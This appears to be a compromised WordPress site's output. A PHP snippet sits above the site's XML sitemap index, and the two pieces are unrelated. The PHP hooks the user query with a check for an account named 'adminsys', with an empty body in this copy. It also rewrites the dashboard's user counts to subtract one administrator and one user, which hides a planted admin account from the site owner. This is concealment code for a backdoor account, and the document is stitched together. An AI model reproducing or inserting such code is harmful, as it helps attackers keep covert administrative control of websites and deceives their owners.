

add_action( 'pre_user_query', 'site_pre_user_query_kh' );

function site_pre_user_query_kh( $user_search ) {
    global $current_user, $wpdb;

    if ( $current_user->user_login !== 'adminsys' ) {
        
    }
}

add_filter( 'views_users', 'site_list_table_views_kh' );

function site_list_table_views_kh( $views ) {
    $users      = count_users();
    $admins_num = $users['avail_roles']['administrator'] - 1;
    $all_num    = $users['total_users'] - 1;

    $is_adm = strpos( $views['administrator'], 'current' ) === false ? '' : 'current';
    $is_all = strpos( $views['all'], 'current' ) === false ? '' : 'current';

    $views['administrator'] = '<a href="users.php?role=administrator" class="' . $is_adm . '">' .
        translate_user_role( 'Administrator' ) . ' <span class="count">(' . $admins_num . ')</span></a>';
    $views['all'] = '<a href="users.php" class="' . $is_all . '">' .
        __( 'All' ) . ' <span class="count">(' . $all_num . ')</span></a>';

    return $views;
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.prestigerealitythailand.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-posts-post-2.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-posts-property-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-posts-portfolio-agent-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-taxonomies-category_real_estate-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-taxonomies-tag_real_estate-1.xml</loc></sitemap><sitemap><loc>https://www.prestigerealitythailand.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
